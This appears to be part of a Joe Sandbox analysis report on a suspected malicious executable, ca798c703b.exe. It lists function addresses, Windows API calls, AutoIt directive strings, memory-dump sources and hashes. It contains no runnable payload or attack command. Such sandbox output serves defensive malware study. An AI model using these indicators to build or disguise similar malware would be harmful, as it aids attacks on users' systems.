GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe,00000104), ref: 00801769
_free.LIBCMT ref: 00801834
_free.LIBCMT ref: 0080183E

Strings

C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe, xrefs: 00801760, 00801767, 00801796, 008017CE

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe
API String ID: 2506810119-3981448688
Opcode ID: c543f436d1667fa1613bb4f863cb20123a5c8705121373921888259cda0c51b5
Instruction ID: 5028516117bb0f1259f8a283def62f7c3dba9a113cda2fbf4d5668144b49a604
Opcode Fuzzy Hash: c543f436d1667fa1613bb4f863cb20123a5c8705121373921888259cda0c51b5
Instruction Fuzzy Hash: 00314D75A40218EBDF61DF999C89E9EBBFCFB85320F144166F904D7291D6B08E40CB91

Function 0083C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0083C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0083C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008A1990,016D5298), ref: 0083C395

Strings

0, xrefs: 0083C2DF

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 144aaea9930df973bafe29dc321132f10443a7ef8d703ee9931887462c20a9a9
Instruction ID: 81f5ce0547ea88294ed2b9c300935bbda8a4c7dcf387416fbbc5b7070aa2a4ca
Opcode Fuzzy Hash: 144aaea9930df973bafe29dc321132f10443a7ef8d703ee9931887462c20a9a9
Instruction Fuzzy Hash: 86417C712043019FD720DF29D885B6ABBE4FBC5324F148A1EF9A5E7391D770A904CB92

Function 00864416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0086CC08,00000000,?,?,?,?), ref: 008644AA
GetWindowLongW.USER32 ref: 008644C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 008644D7

Strings

SysTreeView32, xrefs: 0086447C

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 50d16688279d56d080b4ab4a974d48e19c9ffd9436b14e7e52aec1b9ce7291cb
Instruction ID: 5dac5f1087a3714ae5e33104e76a6fc5837200b6a09f05684b1269ec5f75fdfb
Opcode Fuzzy Hash: 50d16688279d56d080b4ab4a974d48e19c9ffd9436b14e7e52aec1b9ce7291cb
Instruction Fuzzy Hash: 80319E31211205ABDF219E38DC4ABEA7BA9FB09324F225315F975E21D0DB74EC509754

Function 0085304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0085335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00853077,?,?), ref: 00853378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0085307A
_wcslen.LIBCMT ref: 0085309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00853106

Strings

255.255.255.255, xrefs: 00853095, 0085309A

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 92b6845eb639716efdb748e01be1ad17feae7cb275e816d5e05a83c75075622b
Instruction ID: 9afe7efc505d47977a941e3b75606205cf73ac66b98bac601defc47a8df6c8b0
Opcode Fuzzy Hash: 92b6845eb639716efdb748e01be1ad17feae7cb275e816d5e05a83c75075622b
Instruction Fuzzy Hash: AB31B235200605DFCB20CF68C485AAAB7E0FF54399F248059E915CB392DB71EE49C760

Function 00864653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00864705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00864713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0086471A

Strings

msctls_updown32, xrefs: 00864684

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 462b35ea22b694ab4e02f3885098df572d921306af269e6181fcb5024bb4159f
Instruction ID: 5ca3372ab0f959f5fe40201a84fbdd9e0df5544f6941063aa497675130965ff2
Opcode Fuzzy Hash: 462b35ea22b694ab4e02f3885098df572d921306af269e6181fcb5024bb4159f
Instruction Fuzzy Hash: D1215CB5600209AFEB10DF68DC95DBB3BADFB5A3A4B051059FA01DB361DB70EC51CA60

Function 008395AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0083961D

Strings

#notrayicon, xrefs: 008395B7
#requireadmin, xrefs: 008395D9
#OnAutoItStartRegister, xrefs: 008395F3

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 9819290030d763a79f5d7986cb4b890b06839586708f8548a5d6469961c6ef0c
Instruction ID: ee409e16c2a12da32adfcf006e1d77a5e05498b118beb28b84e1c8da96952be1
Opcode Fuzzy Hash: 9819290030d763a79f5d7986cb4b890b06839586708f8548a5d6469961c6ef0c
Instruction Fuzzy Hash: C0212632205614A6C331AB249806FB77398FFE1314F504026FA9AD7241FBD9ED81C2D5

Function 008637B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00863840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00863850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00863876

Strings

Listbox, xrefs: 0086380F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 6f3229ae9b8eaa3228de2911603b4ddd7377d1444385d50e63684b70d0d5421e
Instruction ID: 2ddb56d6997e35e55441795986af441f48fc4af219156861efb1351b64dcc7c1
Opcode Fuzzy Hash: 6f3229ae9b8eaa3228de2911603b4ddd7377d1444385d50e63684b70d0d5421e
Instruction Fuzzy Hash: 6821BE72610218BBEF219F54DC85FBB376AFF89760F128124FA149B190C6B1DC5287A0

Function 008449F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00844A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00844A5C
SetErrorMode.KERNEL32(00000000,?,?,0086CC08), ref: 00844AD0

Strings

%lu, xrefs: 00844A6F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 733e9ac7ab95ffc6d28d2f5c87fb1a0b232d55bb5ad059e03550c9b53816eacf
Instruction ID: 6f1285b80a5852d8f68ebd8da8dcedbf557cfc555c5f16c2927749e9388bb0cf
Opcode Fuzzy Hash: 733e9ac7ab95ffc6d28d2f5c87fb1a0b232d55bb5ad059e03550c9b53816eacf
Instruction Fuzzy Hash: 7A313E75A00219AFDB10DF64C885EAA7BF8FF09308F1480A5E909DB362DB75ED45CB61

Function 008641EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0086424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00864264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00864271

Strings

msctls_trackbar32, xrefs: 00864226

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 96e62e5d55b3551e954aab72f21348e9ec12ff178399e11c4211931f4ea5b76e
Instruction ID: 1ad2da67972f2655f3e60c4f456009a23dd97c8baf5185b938f2dddc7e9880b4
Opcode Fuzzy Hash: 96e62e5d55b3551e954aab72f21348e9ec12ff178399e11c4211931f4ea5b76e
Instruction Fuzzy Hash: 3F110231240208BEEF205F28CC46FAF3BACFF95B64F121124FA55E61A0D2B1DC619B20

Function 00832F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A

Part of subcall function 00832DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00832DC5
Part of subcall function 00832DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00832DD6
Part of subcall function 00832DA7: GetCurrentThreadId.KERNEL32 ref: 00832DDD
Part of subcall function 00832DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00832DE4

GetFocus.USER32 ref: 00832F78

Part of subcall function 00832DEE: GetParent.USER32(00000000), ref: 00832DF9

GetClassNameW.USER32(?,?,00000100), ref: 00832FC3
EnumChildWindows.USER32(?,0083303B), ref: 00832FEB

Strings

%s%d, xrefs: 00832FFF

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: e39b3a9e691dbd9ac88c28cb0de61d18ba0d3f13fef7c9321045377451a0a5a7
Instruction ID: 2c524fa2049c6f858331f1615a58ec6f658272bfc92e5d6c894f840a77a59071
Opcode Fuzzy Hash: e39b3a9e691dbd9ac88c28cb0de61d18ba0d3f13fef7c9321045377451a0a5a7
Instruction Fuzzy Hash: FF1190B1600209ABCF157F648C99EED376AFFD4304F04407AF909EB252DE7499458BB1

Function 00865882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008658C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008658EE
DrawMenuBar.USER32(?), ref: 008658FD

Strings

0, xrefs: 0086588F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 07e288f33fbad134fefecb6ce3f50b1772b6f6a0014affe4bafa7a0de304808e
Instruction ID: 442e8366fcadf2a40cf52c9766e32f779f8fb567b7b029278d6886339c45a4b7
Opcode Fuzzy Hash: 07e288f33fbad134fefecb6ce3f50b1772b6f6a0014affe4bafa7a0de304808e
Instruction Fuzzy Hash: CD016D31500258EFDB219F11EC48BAEBBB4FB45364F118099E889D6151DF709A84DF31

Function 0083007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd49d8275389a2f5f8ccdfc3ce24aab2a6139bcf63e8ffb6432642246dcb8317
Instruction ID: be6453b64d2bf07d39b469b0bb37c8d26886b9c9a5b636e398318e1451c418a1
Opcode Fuzzy Hash: fd49d8275389a2f5f8ccdfc3ce24aab2a6139bcf63e8ffb6432642246dcb8317
Instruction Fuzzy Hash: 3FC13975A0021AEFDB15CFA8C8A4AAEB7B5FF88704F208598E505EB251D771ED41CF90

Function 0085342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00853459
CoUninitialize.OLE32 ref: 00853463
VariantInit.OLEAUT32(?), ref: 0085346E
VariantClear.OLEAUT32(?), ref: 0085371B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 312cd5391da3f60d86fdbbc6d55dfbd8cd2d706e2b9249c5ea1e9d99ce32b8d4
Instruction ID: 23d9658cf26e00a2f0c61b20e2c7401486a7709ee058553cf438e5356c852187
Opcode Fuzzy Hash: 312cd5391da3f60d86fdbbc6d55dfbd8cd2d706e2b9249c5ea1e9d99ce32b8d4
Instruction Fuzzy Hash: D8A11575604200DFC714DF28C485A2AB7E5FF88755F04895AF98ADB362DB34EE05CB92

Function 00830436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0086FC08,?), ref: 008305F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0086FC08,?), ref: 00830608
CLSIDFromProgID.OLE32(?,?,00000000,0086CC40,000000FF,?,00000000,00000800,00000000,?,0086FC08,?), ref: 0083062D
_memcmp.LIBVCRUNTIME ref: 0083064E

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 8bc78bbf6d5e0ab1b9b530198e2346220436859274a31982a1194af77746842a
Instruction ID: f94a948dbb7ba25e062323c407f0d8fa070083eeabf21dc29a71b03aa9503718
Opcode Fuzzy Hash: 8bc78bbf6d5e0ab1b9b530198e2346220436859274a31982a1194af77746842a
Instruction Fuzzy Hash: FB81E871A00209EFCB04DF94C994DAEB7B9FF89315F204598E516EB250DB71AE06CFA0

Function 00811391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008114C0

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9c462645ea1384943b9016d82d598867fa9242192599ce068834b6171642fdca
Instruction ID: 3464cbdc5024c8923d4d9af86557ce486b403f35598606a3d7b12e75f9f723c8
Opcode Fuzzy Hash: 9c462645ea1384943b9016d82d598867fa9242192599ce068834b6171642fdca
Instruction Fuzzy Hash: AA413B31600508ABDF216FFC9C4DAFE3AAEFF41770F240225F619D62D2EA7848815366

Function 00866278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 008662E2
ScreenToClient.USER32(?,?), ref: 00866315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00866382

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 38c78445c54d124dc2c67dd8a25814032971e7dd8dfc2d4c14dfb09194a9c322
Instruction ID: 7059feeaeac48e56fc6d2f0eee7134c1b34703c584bce9142caef63ed708bd68
Opcode Fuzzy Hash: 38c78445c54d124dc2c67dd8a25814032971e7dd8dfc2d4c14dfb09194a9c322
Instruction Fuzzy Hash: 96515A70A00249EFDF10DF68D9809AE7BB5FB45364F11815AF815DB390E730AD91CB50

Function 00851AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00851AFD
WSAGetLastError.WSOCK32 ref: 00851B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00851B8A
WSAGetLastError.WSOCK32 ref: 00851B94

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: e5d421a671162574d2c98bc85cec6964e09a59fdb58356e200da381e88bb86c6
Instruction ID: 396804fe844967c5886d798f12f0c672338979d39c3cb83a78d6565f65bab624
Opcode Fuzzy Hash: e5d421a671162574d2c98bc85cec6964e09a59fdb58356e200da381e88bb86c6
Instruction Fuzzy Hash: 3241D334600200AFEB20AF24C88AF2977E5EB49718F548458F95A9F3D3D7B6ED41CB91

Function 0080B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c18317c6e2f875d49f166705c40ffe4310e0ab5a13c25104c4974adfe57aca8
Instruction ID: 6a65ac2818a85c865bf10eb9c230806fe118bcf0a397871c4df15bc0f214f1eb
Opcode Fuzzy Hash: 9c18317c6e2f875d49f166705c40ffe4310e0ab5a13c25104c4974adfe57aca8
Instruction Fuzzy Hash: 61410672A00708AFD7249F7CCC45BAEBBA9FF88710F10856AF145DB2D2D7719A418781

Function 008456D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

